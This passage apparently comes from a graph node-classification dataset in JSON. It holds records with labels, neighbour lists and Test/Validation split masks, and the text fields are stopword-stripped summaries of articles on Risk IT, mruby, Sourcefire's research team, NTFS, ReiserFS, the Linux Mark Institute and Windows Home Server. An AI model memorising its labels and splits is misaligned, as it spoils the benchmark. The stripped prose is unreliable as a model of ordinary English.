    "text": "Risk_IT:risk risk provides end-to-end comprehensive view risks related use information technology similarly thorough treatment risk management tone culture top operational issues risk published 2009 isaca result work group composed industry experts academics different nations coming organizations ernst young ibm pricewaterhousecoopers risk management insight swiss life kpmg risk part business risk—specifically business risk associated use ownership operation involvement influence adoption within enterprise consists it-related events could potentially impact business occur uncertain frequency magnitude creates challenges meeting strategic goals objectives management business risk essential component responsible administration organization due importance overall business risk treated like key business risks risk framework explains risk enables users risk managed key business leaders inside organization technical issue department risk categorised different ways risk framework based principles enterprise risk management standards/frameworks committee sponsoring organizations treadway commission erm iso 31000 way risk could understood upper management risk built around following principles major risk communication flows effective information three domains risk framework listed contained processes three domain process contains number activities process detailed domain maturity model depicted link risk scenarios ultimate business impact needs established understand effect adverse events risk prescribe single method different methods available among risk scenarios hearth risk evaluation process scenarios derived two different complementary ways risk scenarios analysed determining frequency impact based risk factors purpose defining risk response bring risk line overall defined risk appetite organization risk analysis i.e residual risk within risk tolerance limits risk managed according four main strategies combination key risk indicators metrics capable showing organizaztion subject high probability subject risk exceeds defined risk appetite second important document risk practitioner guide made eight sections risk framework complements isaca ’ cobit provides comprehensive framework control governance business-driven information-technology-based it-based solutions services cobit sets good practices means risk management providing set controls mitigate risk risk sets good practices ends providing framework enterprises identify govern manage risk val allows business managers get business value investments providing governance framework val used evaluate actions determined risk management process risk accept factor analysis information risk terminology evaluation process comparison risk processes foreseen iso/iec 27005 standard see risk management risk management methodology risk management iso 27005 framework risk practitioner guide appendix 2 contains comparison iso 31000 risk practitioner guide appendix 4 contains comparison coso",
    "neighbors": [
      3552,
      5636,
      1479,
      7979,
      11567,
      6902,
      3323,
      10717
    ],
    "mask": "Test"
  },
  {
    "node_id": 2191,
    "label": 9,
    "text": "Mruby:mruby mruby interpreter ruby programming language intention lightweight easily embeddable project headed yukihiro matsumoto 100 contributors currently working project mruby 1.0 supports ruby 2.1 core ap none standard library well able execute basic ruby code mruby also features bytecode compiler virtual machine well ability easily embedded integrated c c++ code similar manner lua tcl mruby 2.0.0 adds support several ruby 2.x methods beyond ruby 2.1. v2.0.0 also changed variable length bytecode instructions format mruby bytecode embedded c code thus compiled standalone executable mruby also aims compliant iso/iec 30170:2012 standard assuming mruby installed path following program compiled executed running following command terminal mruby includes minimalistic virtual machine used execute mruby bytecode nicknamed ritevm first command compiles ruby code mruby bytecode creating file called test.mrb executed appending -b flag normal interpreter arguments",
    "neighbors": [
      7430,
      9229,
      7695,
      10771,
      9245,
      4777,
      7983,
      692,
      564,
      4277,
      5945,
      1852,
      5567,
      6338,
      11208,
      5578,
      11221,
      10973,
      1379,
      11625,
      5612,
      2804,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 2192,
    "label": 4,
    "text": "Sourcefire_Vulnerability_Research_Team:sourcefire vulnerability research team sourcefire vulnerability research team vrt group network security engineers discovered assessed trends hacking activities intrusion attempts vulnerabilities members sourcefire vrt include clamav team well authors several standard security reference books articles sourcefire vrt also supported resources open source snort clamav communities group focuses developing vulnerability-based rules protect emerging exploits sourcefire customers snort users vrt provided zero-day protection outbreaks malware including conficker netsky nachi blaster sasser zotob nachi among others vrt also delivers rules provide day protection microsoft tuesday vulnerabilities develops official snort rules used sourcefire 3d system develops maintains official rule set snort.org maintains shared object rules distributed various platforms binary format following cisco acquisition sourcefire 2014 vrt combined cisco trac secapps security applications group form cisco talos",
    "neighbors": [
      7843,
      2409,
      7515,
      5245,
      3486
    ],
    "mask": "Test"
  },
  {
    "node_id": 2193,
    "label": 6,
    "text": "NTFS:ntfs ntfs new technology file system proprietary journaling file system developed microsoft starting windows nt 3.1 default file system windows nt family ntfs several technical improvements file systems superseded – file allocation table fat high performance file system hpfs – improved support metadata advanced data structures improve performance reliability disk space use additional extensions elaborate security system based access control lists acls file system journaling ntfs supported desktop server operating systems well linux bsd free open-source ntfs driver called ntfs-3g read write functionality macos comes read-only support ntfs disabled-by-default write support ntfs unstable mid-1980s microsoft ibm formed joint project create next generation graphical operating system result os/2 hpfs microsoft disagreed ibm many important issues eventually separated os/2 remained ibm project microsoft worked develop windows nt ntfs hpfs file system os/2 contained several important new features microsoft created new operating system borrowed many concepts ntfs original ntfs developers tom miller gary kimura brian andrew david goebel probably result common ancestry hpfs ntfs use disk partition identification type code 07 using partition id record number highly unusual since dozens unused code numbers available major file systems codes example fat nine one fat12 fat16 fat32 etc. algorithms identifying file system partition type 07 must perform additional checks distinguish hpfs ntfs microsoft released five versions ntfs version number e.g v5.0 windows 2000 based operating system version confused ntfs version number v3.1 since windows xp although subsequent versions windows added new file system-related features change ntfs example windows vista implemented ntfs symbolic links transactional ntfs partition shrinking self-healing ntfs symbolic links new feature file system others new operating system features make use ntfs features already place ntfs v3.0 includes several new features predecessors sparse file support disk use quotas reparse points distributed link tracking file-level encryption called encrypting file system efs ntfs optimized 4 kb clusters supports maximum cluster size 2mb earlier implementations support 64kb maximum ntfs volume size specification support clusters implementations achieve theoretical maximum discussed maximum ntfs volume size implemented windows xp professional clusters partly due partition table limitations example using 64kb clusters maximum size windows xp ntfs volume 256tb minus 64kb using default cluster size 4kb maximum ntfs volume size 16tb minus 4kb vastly higher 128gb limit windows xp sp1 partition tables master boot record mbr disks support partition sizes 2tb multiple guid partition table gpt dynamic volumes must combined create single ntfs volume larger 2tb booting gpt volume windows environment microsoft supported way requires system unified extensible firmware interface uefi 64-bit support ntfs maximum theoretical limit size individual files 16eib minus 1kb totals 18,446,744,073,709,550,592 bytes windows 10 version 1709 windows server 2019 maximum implemented file size 8pb minus 2mb 9,007,199,252,643,840 bytes ntfs journaling file system uses ntfs log logfile record metadata changes volume feature fat provide critical ntfs ensure complex internal data structures remain consistent case system crashes data moves performed defragmentation api allow easy rollback uncommitted changes critical data structures volume remounted notably affected structures volume allocation bitmap modifications mft records moves variable-length attributes stored mft records attribute lists indices directories security descriptors usn journal update sequence number journal system management feature records extend\\ usnjrnl changes files streams directories volume well various attributes security settings journal made available applications track changes volume journal enabled disabled non-system volumes hard link feature allows different file names directly refer file contents hard links similar directory junctions refer files instead hard links may link files volume volume mft hard links file metadata change file size attributes one hard link may update others opened hard links originally included support posix subsystem windows nt windows uses hard links support short 8.3 filenames ntfs operating system support needed legacy applications work 8.3 filenames case additional filename record directory entry added 8.3 long file name linked updated together unlike regular hard link ntfs file system limit 1024 hard links file alternate data streams allow one data stream associated filename fork using format filename streamname e.g. text.txt extrastream ntfs streams introduced windows nt 3.1 enable services macintosh sfm store resource forks although current versions windows server longer include sfm third-party apple filing protocol afp products grouplogic extremez-ip still use feature file system small ads named zone.identifier added internet explorer recently browsers mark files downloaded external sites possibly unsafe run local shell would require user confirmation opening user indicates longer want confirmation dialog ads deleted alternate streams listed windows explorer size included file size file copied moved another file system without ads support user warned alternate data streams preserved warning typically provided file attached e-mail uploaded website thus using alternate streams critical data may cause problems microsoft provides tool called streams view streams selected volume starting windows powershell 3.0 possible manage ads natively six cmdlets add-content clear-content get-content get-item remove-item set-content malware used alternate data streams hide code result malware scanners special tools check alternate data streams ntfs compress files using lznt1 algorithm variant lz77 files compressed 16 cluster chunks 4 kb clusters files compressed 64 kb chunks compression algorithms ntfs designed support cluster sizes 4 kb cluster size greater 4 kb ntfs volume ntfs compression available compression reduces 64kb data 60kb less ntfs treats unneeded 4kb pages like empty sparse file clusters—they written allows reasonable random-access times os follow chain fragments however large compressible files become highly fragmented since every chunk smaller 64kb becomes fragment according research microsoft ntfs development team 50–60gb reasonable maximum size compressed file ntfs volume 4kb default cluster block size reasonable maximum size decreases sharply volumes smaller cluster sizes single-user systems limited hard disk space benefit ntfs compression small files 4kb 64kb depending compressibility files smaller approximately 900 bytes stored within directory entry mft flash memory ssd drives head movement delays hard disk drives fragmentation smaller penalty users fast multi-core processors find improvements application speed compressing applications data well reduction space used note ssds sandforce controllers already compress data however since less data transferred reduction i/os compression works best files repetitive content seldom written usually accessed sequentially compressed log files ideal example system files needed boot time drivers ntldr winload.exe bootmgr compressed system may fail boot correctly decompression filters yet loaded later editions windows allow important system files compressed files may compressed decompressed individually via changing advanced attributes drive directory directory tree becoming default files inside although read–write access compressed files mostly transparent microsoft recommends avoiding compression server systems and/or network shares holding roaming profiles puts considerable load processor sparse files files interspersed empty segments actual storage space used applications file looks like ordinary file empty regions seen regions filled zeros sparse file necessarily include sparse zeros areas sparse file attribute means file allowed database applications instance may use sparse files compressed files actual sizes sparse files taken account determining quota limits volume shadow copy service vss keeps historical versions files folders ntfs volumes copying old newly overwritten data shadow copy via copy-on-write technique user may later request earlier version recovered also allows data backup programs archive files currently use file system heavily loaded systems microsoft recommends setting shadow copy volume separate disk windows vista also introduced persistent shadow copies use system restore previous versions features persistent shadow copies however deleted older operating system mounts ntfs volume happens older operating system understand newer format persistent shadow copies windows vista applications use transactional ntfs txf group multiple changes files together single transaction transaction guarantee either changes happen none application outside transaction see changes committed uses similar techniques used volume shadow copies i.e copy-on-write ensure overwritten data safely rolled back clfs log mark transactions still committed committed still fully applied case system crash commit one participants transactional ntfs restrict transactions local ntfs volume also includes transactional data operations locations data stored separate volumes local registry sql databases current states system services remote services transactions coordinated network-wide participants using specific service dtc ensure participants receive commit state transport changes validated participant others invalidate local caches old data rollback ongoing uncommitted changes transactional ntfs allows example creation network-wide consistent distributed file systems including local live offline caches microsoft advises using txf microsoft strongly recommends developers utilize alternative means since txf may available future versions microsoft windows ntfs file folder assigned security descriptor defines owner contains two access control lists acls first acl called discretionary access control list dacl defines exactly type interactions e.g reading writing executing deleting allowed forbidden user groups users example files folder may read executed users modified user holding administrative privileges windows vista adds mandatory access control info dacls dacls primary focus user account control windows vista later second acl called system access control list sacl defines interactions file folder audited whether logged activity successful failed example auditing enabled sensitive files company managers get know someone tries delete make copy whether succeeds encrypting file system efs provides strong user-transparent encryption file folder ntfs volume efs works conjunction efs service microsoft cryptoapi efs file system run-time library fsrtl efs works encrypting file bulk symmetric key also known file encryption key fek used takes relatively small amount time encrypt decrypt large amounts data asymmetric key cipher used symmetric key used encrypt file encrypted public key associated user encrypted file encrypted data stored alternate data stream encrypted file decrypt file file system uses private key user decrypt symmetric key stored file header uses symmetric key decrypt file done file system level transparent user also case user losing access key support additional decryption keys built efs system recovery agent still access files needed ntfs-provided encryption ntfs-provided compression mutually exclusive however ntfs used one third-party tool support efs available basic home mediacenter versions windows must activated installation professional ultimate server versions windows using enterprise deployment tools within windows domains disk quotas introduced ntfs v3 allow administrator computer runs version windows supports ntfs set threshold disk space users may use also allows administrators keep track much disk space user using administrator may specify certain level disk space user may use receive warning deny access user hit upper limit space disk quotas take account ntfs transparent file-compression enabled applications query amount free space also see amount free space left user quota applied introduced ntfs v3 ntfs reparse points used associating reparse tag user space attribute file directory microsoft includes several default tags including symbolic links directory junction points volume mount points object manager parses file system name lookup encounters reparse attribute reparse name lookup passing user controlled reparse data every file system filter driver loaded windows filter driver examines reparse data see whether associated reparse point filter driver determines match intercepts file system request performs special functionality starting windows vista microsoft added built-in ability shrink expand partition however ability relocate page file fragments files marked unmovable shrinking volume often require relocating disabling page file index windows search shadow copy used system restore various third-party tools capable resizing ntfs partitions internally ntfs uses b-trees index file system data although complex implement allows faster file look times cases file system journal used guarantee integrity file system metadata individual files content systems using ntfs known improved reliability compared fat file systems ntfs allows sequence 16-bit values name encoding file names stream names index names etc except 0x0000 means utf-16 code units supported file system check whether sequence valid utf-16 allows sequence short values restricted unicode standard win32 namespace utf-16 code units case insensitive whereas posix namespace case sensitive file names limited 255 utf-16 code units certain names reserved volume root directory used files codice_1 codice_2 codice_3 codice_4 codice_5 codice_6 dot codice_7 codice_8 codice_9 codice_10 codice_11 codice_12 dot extend directories others files nt kernel limits full paths 32,767 utf-16 code units additional restrictions code points file names boot partition format roughly based upon earlier fat filesystem fields different locations fields especially sectors per track number heads hidden sectors fields may contain dummy values drives either make sense determinable os first looks 8 bytes 0x30 find cluster number mft multiplies number number sectors per cluster 1 byte found 0x0d value sector offset lba mft described ntfs file directory metafile data—file name creation date access permissions use access control lists size—are stored metadata master file table mft abstract approach allowed easy addition file system features windows nt development—an example addition fields indexing used active directory software also enables fast file search software locate named local files folders included mft quickly without requiring index mft structure supports algorithms minimize disk fragmentation directory entry consists filename file id record number representing file master file table file id also contains reuse count detect stale references strongly resembles w_fid files-11 ntfs structures radically differ two copies mft stored case corruption first record corrupted ntfs reads second record find mft mirror file locations files stored boot sector ntfs contains several files define organize file system respects files structured like user file volume peculiar direct interest file system clients metafiles define files back critical file system data buffer file system changes manage free space allocation satisfy bios expectations track bad allocation units store security disk space usage information content unnamed data stream unless otherwise indicated metafiles treated specially windows handled directly codice_13 driver difficult directly view special purpose-built tools needed windows 7 ntfs driver completely prohibits user access resulting bsod whenever attempt execute metadata file made one tool nfi.exe ntfs file sector information utility freely distributed part microsoft oem support tools example obtain information mft -master file table segment following command used codice_14 another way bypass restriction use 7-zip file manager go low-level ntfs path codice_15 codice_16 resembles drive/partition 3 new folders appear codice_17 codice_18 pseudo-folder 7-zip uses attach files deleted file system view codice_19 another pseudo-folder contains ntfs metadata files trick used removable devices usb flash drives external hard drives sd cards etc inside windows active partition requires offline access namely winre file directory described mft record linear repository stream descriptors also named attributes packed together one mft records containing so-called attributes list extra padding fill fixed 1 kb size every mft record fully describes effective streams associated file attribute attribute type fixed-size integer mapping attribute definition file attrdef optional attribute name example used name alternate data stream value represented sequence bytes ntfs standard data files alternate data streams index data directories stored attributes according attrdef attributes either resident non-resident data attribute contains file data example attribute resident represented flag value stored directly mft record otherwise clusters allocated data cluster location information stored data runs attribute attributes given file may displayed using nfi.exe ntfs file sector information utility freely distributed part microsoft oem support tools windows system calls may handle alternate data streams depending operating system utility remote file system file transfer might silently strip data streams safe way copying moving files use backupread backupwrite system calls allow programs enumerate streams verify whether stream written destination volume knowingly skip unwanted streams optimize storage reduce i/o overhead common case attributes small associated value ntfs prefers place value within attribute size attribute exceed maximum size mft record instead using mft record space list clusters containing data case attribute store data directly store allocation map form data runs pointing actual data stored elsewhere volume value accessed directly within attribute called resident data computer forensics workers amount data fits highly dependent file characteristics 700 800 bytes common single-stream files non-lengthy filenames acls allocation map stored form data runs compressed encoding data run represents contiguous group clusters store attribute value files multi-gb volume entry encoded 5 7 bytes means 1 kb mft record store 100 data runs however attribute_list also size limit dangerous 1 million fragments single file ntfs volume also implies general good idea use ntfs compression file larger 10gb ntfs file system driver sometimes attempt relocate data attributes made non-resident clusters also attempt relocate data stored clusters back attribute inside mft record based priority preferred ordering rules size constraints since resident files directly occupy clusters allocation units possible ntfs volume contain files volume clusters example 74.5gb partition ntfs formats 19,543,064 clusters 4kb subtracting system files 64mb log file 2,442,888-byte bitmap file 25 clusters fixed overhead leaves 19,526,158 clusters free files indices since four mft records per cluster volume theoretically could hold almost 4 × 19,526,158= 78,104,632 resident files opportunistic file locks oplocks allow clients alter buffering strategy given file stream order increase performance reduce network use oplocks apply given open stream file affect oplocks different stream oplocks used transparently access files background network client may avoid writing information file remote server process accessing data may buffer read-ahead data process writing data windows supports four different types oplocks opportunistic locks enhanced windows 7 windows server 2008 r2 per-client oplock keys windows nt descendants keep internal timestamps utc make appropriate conversions display purposes ntfs timestamps utc historical reasons versions windows support ntfs keep time internally local zone time therefore file systems – ntfs – supported current versions windows means files copied moved ntfs non-ntfs partitions os needs convert timestamps fly files moved daylight saving time dst effect files moved standard time effect ambiguities conversions result especially shortly one days local zone time changes users may observe files timestamps incorrect one hour due differences implementation dst different jurisdictions result potential timestamp error 4 hours given 12 months different ntfs versions part fully forward- backward-compatible technical considerations mounting newer ntfs volumes older versions microsoft windows affects dual-booting external portable hard drives example attempting use ntfs partition previous versions a.k.a volume shadow copy operating system support result contents previous versions lost windows command-line utility called convert.exe convert supporting file systems ntfs including hpfs windows nt 3.1 3.5 3.51 fat16 fat32 windows 2000 later windows 10 version 1709 known fall creators update microsoft requires onedrive file structure reside ntfs disk reparse tag every file directory within local onedrive file structure set recursive manner thus making file folder unusable previous version windows ntfs file system driver file system backup utilities updated support unknown whether recursive linking feature ntfs file system undocumented workaround microsoft support onedrive new files on-demand feature mac os x 10.3 later include read-only support ntfs-formatted partitions gpl-licensed ntfs-3g also works mac os x fuse allows reading writing ntfs partitions performance enhanced commercial version called tuxera ntfs mac also available ntfs-3g developers paragon software group sells read-write driver named ntfs mac os x also included models seagate hard drives native ntfs write support discovered mac os x 10.6 later activated default although workarounds exist enable functionality however user reports indicate functionality unstable tends cause kernel panics probably reason write support enabled advertised linux kernel versions 2.2.0 later include ability read ntfs partitions kernel versions 2.6.0 later contain driver written anton altaparmakov university cambridge richard russon supports file read overwrite resize three userspace drivers ntfsmount ntfs-3g captive ntfs 'wrapping driver uses windows driver ntfs.sys exist ntfs support built filesystem userspace fuse linux kernel module tasked bridging userspace kernel code save retrieve data three licensed terms gnu general public license gpl due complexity internal ntfs structures built-in 2.6.14 kernel driver fuse drivers disallow changes volume considered unsafe avoid corruption two proprietary solutions also exist ecomstation freebsd offer read-only ntfs support beta ntfs driver allows write/delete ecomstation generally considered unsafe free third-party tool beos based ntfs-3g allows full ntfs read write ntfs-3g free implementation ntfs initially developed linux also works macos freebsd netbsd openbsd ntfs-3g available ports solaris qnx haiku fuse free-for-personal-use read/write driver ms-dos avira called ntfs4dos ahead software developed ntfsread driver version 1.200 dr-dos 7.0x 2002 2004 part nero burning rom software openbsd offers native read-only ntfs support default i386 amd64 platforms version 4.9 released 1 may 2011",
    "neighbors": [
      2051,
      10257,
      8214,
      8227,
      8228,
      10281,
      2101,
      2107,
      8254,
      10306,
      10310,
      4173,
      4174,
      4178,
      6233,
      4210,
      6263,
      6265,
      8328,
      139,
      2193,
      2194,
      2196,
      2197,
      2199,
      4248,
      6297,
      6309,
      10405,
      2221,
      8369,
      178,
      2230,
      8380,
      10428,
      2244,
      8391,
      200,
      8398,
      8402,
      8404,
      8410,
      4316,
      6365,
      4326,
      2279,
      10476,
      242,
      2291,
      246,
      2314,
      8461,
      6416,
      274,
      2322,
      8473,
      287,
      6434,
      292,
      8485,
      302,
      2378,
      10570,
      6476,
      4431,
      10580,
      4439,
      346,
      2395,
      2397,
      2402,
      10596,
      2407,
      4458,
      6506,
      6519,
      376,
      8572,
      2432,
      6545,
      4505,
      414,
      2462,
      8618,
      430,
      432,
      10673,
      6579,
      10675,
      8631,
      6584,
      2494,
      8643,
      4563,
      4564,
      8659,
      4571,
      478,
      491,
      6637,
      6641,
      2555,
      2564,
      2568,
      6669,
      4624,
      6677,
      537,
      540,
      6690,
      8740,
      10812,
      8772,
      10828,
      10839,
      603,
      10851,
      4708,
      622,
      6768,
      4731,
      639,
      2687,
      641,
      10879,
      8841,
      6797,
      654,
      8852,
      10900,
      8857,
      4763,
      4771,
      6820,
      4789,
      2749,
      10951,
      10952,
      4815,
      4819,
      728,
      2782,
      739,
      4836,
      4841,
      8938,
      10993,
      8959,
      11012,
      8976,
      788,
      6935,
      8985,
      11033,
      6939,
      8988,
      4907,
      9004,
      6961,
      6963,
      823,
      6970,
      6972,
      4926,
      11072,
      11076,
      11082,
      850,
      4948,
      2919,
      9066,
      11123,
      11128,
      890,
      894,
      2943,
      5003,
      5004,
      2959,
      5013,
      2974,
      7070,
      929,
      11184,
      960,
      969,
      9166,
      7126,
      5093,
      9189,
      11251,
      11256,
      5120,
      9216,
      11270,
      9236,
      5142,
      1047,
      3102,
      9249,
      5158,
      7225,
      11323,
      7229,
      1098,
      7244,
      1109,
      3170,
      9319,
      5225,
      11370,
      9333,
      9335,
      7290,
      9343,
      9353,
      5264,
      3225,
      11419,
      3233,
      9377,
      3235,
      1190,
      5286,
      5293,
      7342,
      7344,
      3250,
      5300,
      7351,
      1212,
      3265,
      11465,
      9420,
      1231,
      7378,
      7380,
      3289,
      1242,
      9442,
      3308,
      1263,
      3312,
      3323,
      11519,
      3328,
      1291,
      5391,
      3351,
      11543,
      11546,
      9505,
      5413,
      3368,
      11572,
      9525,
      11581,
      3394,
      3404,
      5465,
      7515,
      3420,
      11638,
      9593,
      7554,
      1418,
      7565,
      11667,
      9625,
      11675,
      11676,
      11677,
      11683,
      1454,
      11698,
      7603,
      9655,
      1464,
      5565,
      3535,
      1498,
      5594,
      1501,
      1509,
      1515,
      9709,
      7663,
      3571,
      3573,
      3582,
      5643,
      3598,
      3611,
      5661,
      9762,
      1577,
      7739,
      3648,
      7754,
      5709,
      9808,
      1617,
      5721,
      9819,
      5729,
      1637,
      5736,
      9836,
      7789,
      5743,
      9839,
      9840,
      7796,
      1656,
      9848,
      1659,
      3708,
      7804,
      7810,
      7818,
      9874,
      7838,
      1703,
      1712,
      5816,
      1742,
      3795,
      9953,
      7907,
      1770,
      3826,
      9972,
      1782,
      3834,
      1791,
      3841,
      3856,
      3857,
      1810,
      3859,
      10016,
      1825,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      10039,
      3909,
      3914,
      5969,
      3922,
      3923,
      1891,
      10087,
      3953,
      10109,
      3975,
      8075,
      8080,
      6055,
      10151,
      4012,
      6062,
      1970,
      8114,
      8115,
      1978,
      6075,
      8129,
      8132,
      6088,
      2015,
      6114,
      6115,
      4074
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2194,
    "label": 6,
    "text": "ReiserFS:reiserfs reiserfs general-purpose journaled computer file system initially designed implemented team namesys led hans reiser reiserfs currently supported linux without quota support licensed gplv2 introduced version 2.4.1 linux kernel first journaling file system included standard kernel reiserfs default file system novell suse linux enterprise novell decided move ext3 october 12 2006 future releases namesys considered reiserfs version 3.6 introduced new on-disk format allowing bigger filesizes occasionally referred reiser3 stable feature-complete exception security updates critical bug fixes ceased development concentrate successor reiser4 namesys went business 2008 reiser conviction murder product maintained open source volunteers reiserfsprogs 3.6.27 released 25 july 2017 time introduction reiserfs offered features available existing linux file systems reiserfs stores file metadata stat items directory entries directory items inode block lists indirect items tails files direct items single combined b+ tree keyed universal object id disk blocks allocated nodes tree formatted internal blocks blocks leaf nodes items packed end-to-end formatted leaf blocks blocks unformatted blocks containing file contents directory items many entries indirect items long fit node spill right leaf neighbour block allocation tracked free space bitmaps fixed locations contrast ext2 berkeley ffs-like file systems time simply used fixed formula computing inode locations hence limiting number files may contain file systems also store directories simple lists entries makes directory lookups updates linear time operations degrades performance large directories single b+ tree design reiserfs avoids problems due better scalability properties regarding development filesystem three fields considered separately therefore section contains three tables one 3.5.x series filsystem driver used read write 3.5 on-disk format another one 3.6.x series filsystem driver used read write 3.6 on-disk format third one tools contained codice_1 package since on-disk format 3.6 regarded feature complete stable frozen n't get changed anymore filesystem driver linux part official kernel well codice_1 operating user space still maintained getting updates rarely also new features even nowadays 2019 codice_3 program never fully implemented although attempts year 2014 one reason never finished rise solid state disks ssd – contrary classic spinning wheel hard disk drives hdd – need defragmented precisely n't defragmented unnecessary write operations shorten life ssd compared ext2 ext3 version 2.4 linux kernel dealing files 4 kib tail packing enabled reiserfs may faster said great benefit usenet news spools http caches mail delivery systems applications performance small files critical however practice news spools use feature called cycbuf holds articles one large file fast http caches several revision control systems use similar approach nullifying performance advantages email servers reiserfs problematic due semantic problems explained also reiserfs problem fast filesystem aging compared filesystems — several usage scenarios filesystem performance decreased dramatically time linux 2.6.33 reiserfs heavily used big kernel lock bkl — global kernel-wide lock — scale well systems multiple cores critical code parts ever executed one core time reiserfs default file system suse linux since version 6.4 released 2000 switching ext3 suse linux enterprise 10.2/opensuse 11 announced 2006 jeff mahoney suse wrote post 14 september 2006 proposing move reiserfs ext3 default installation file system reasons mentioned scalability performance problems extended attributes acls small shrinking development community reiser4 incremental update requires reformat unreasonable people october 4 wrote response comment blog order clear issues wrote proposal switch unrelated hans reiser trial murder mahoney wrote concerned people would make connection none existed timing entirely coincidental motivation unrelated directory operations including unlink 2 synchronous reiserfs result data corruption applications relying heavily file-based locks mail transfer agents qmail postfix machine halts synchronized disk programs specifically defragment reiserfs file system although tools written automatically copy contents fragmented files hoping contiguous blocks free space found however repacker tool planned next reiser4 file system deal file fragmentation rise solid state disks problem became irrelevant contrary hard disk drives slow caused fragmentation ssds n't use moving parts even recommended abstain kind defragmentation ssds shorten lifetime tree rebuild process reiserfs fsck attracted much criticism *nix community file system becomes badly corrupted internal tree unusable performing tree rebuild operation may corrupt existing files introduce new entries unexpected contents action part normal operation normal file system check explicitly initiated confirmed administrator reiserfs v3 images stored reiserfs v3 partition e.g. backups disk images emulators without transforming e.g. compressing encrypting order avoid confusing rebuild reformatting existing reiserfs v3 partition also leave behind data could confuse rebuild operation make files old system reappear also allows malicious users intentionally store files confuse rebuilder metadata always consistent state file system check corruption means contents files merged unexpected ways contained file system metadata reiserfs successor reiser4 fixes problem reiserfs versions linux kernel 2.4.16 considered unstable namesys recommended production use especially conjunction nfs early implementations reiserfs prior linux 2.6.2 also susceptible out-of-order write hazards current journaling implementation reiserfs par ext3 ordered journaling level",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7225,
      2107,
      11323,
      8772,
      1109,
      10851,
      4708,
      9319,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      3708,
      9343,
      5256,
      7818,
      654,
      2193,
      2197,
      2199,
      6808,
      11419,
      3745,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      3257,
      1212,
      8380,
      3265,
      10951,
      9420,
      1231,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      4841,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      1291,
      8461,
      6416,
      1810,
      3859,
      3350,
      6935,
      11033,
      287,
      10016,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      819,
      1844,
      6963,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      5474,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7565,
      6545,
      11667,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      3512,
      1978,
      3522,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      5106,
      2036,
      11256,
      2555,
      3582,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 2195,
    "label": 2,
    "text": "Linux_Mark_Institute:linux mark institute linux mark institute lmi fully lmi oregon llc organization administers linux trademark behalf linus torvalds computer software includes linux kernel computer hardware utilizing linux-based software services associated implementation documentation linux-based products linux trademark owned linus torvalds u.s. germany e.u. japan computer operating system software facilitate computer use operation assignment trademark torvalds occurred lawsuit attorney william r. della croce jr. boston registered trademark us september 1995 began 1996 send letters various linux distributors demanding ten percent royalties sales linux products petition della croce practices started early 1997 workgroup solutions yggdrasil linux journal linux international torvalds appealed original trademark assignment fraudulent obtained false pretenses november case settled torvalds owned trademark lmi originally charged nominal sublicensing fee use linux name part trademarks later changed favor offering free perpetual worldwide sublicense lmi headquartered monterey california least 2005 since least 2009 headquartered beaverton oregon",
    "neighbors": [
      2560,
      4616,
      7689,
      3082,
      5644,
      5139,
      9237,
      10780,
      4637,
      10785,
      3618,
      11297,
      6180,
      9257,
      1584,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      2134,
      3162,
      2658,
      6244,
      5222,
      10856,
      6763,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      657,
      2711,
      6808,
      9882,
      6301,
      1694,
      2723,
      8364,
      10933,
      5822,
      5824,
      4803,
      1736,
      2762,
      6352,
      3289,
      3802,
      4831,
      8928,
      1761,
      10464,
      2278,
      233,
      4841,
      7403,
      7920,
      10482,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      5410,
      295,
      1833,
      815,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      3911,
      6988,
      10063,
      4437,
      11095,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      8573,
      1406,
      3458,
      7555,
      900,
      8066,
      11654,
      4493,
      10127,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      10687,
      9667,
      4040,
      457,
      5067,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      2021,
      9190,
      11232,
      1513,
      10732,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 2196,
    "label": 4,
    "text": "Windows_Home_Server:windows home server windows home server code-named quattro home server operating system microsoft announced 7 january 2007 consumer electronics show bill gates released manufacturing 16 july 2007 officially released 4 november 2007 windows home server based windows server 2003 r2 intended solution homes multiple connected pcs offer file sharing automated backups print server remote access paired windows home server console—client software accessed another computer network provide graphical management interface power pack 1 windows home server released 20 july 2008 power pack 2 released 24 march 2009 power pack 3 released 24 november 2009 windows home server 2011 next version operating system released 6 april 2011 microsoft confirmed windows home server 2011 last release windows home server product line configuration interface designed user-friendly enough could set without prior knowledge server administration configuration interface called home server console delivered remote desktop protocol application remote pcs application ran server gui rendered remote system home server console client application could accessed windows pc server required video card peripherals designed require ethernet card least one windows xp windows vista windows 7 computer windows home server drive extender file-based replication system provided three key capabilities drive extender users could add larger capacity hard disk drives could offline lesser capacity drives upgrade capacity online example user reaching capacity share five terabytes six-terabyte capacity used six one-terabyte drives user could offline one one-terabyte drives physically replace two-terabyte drive whs automatically equalizes redistribution used space across available drives regular basis offline process would compress used data across minimum amount drives allowing removal one lesser capacity drives replaced drive higher capacity system automatically redistribute used capacity among pool ensure space capacity drive users 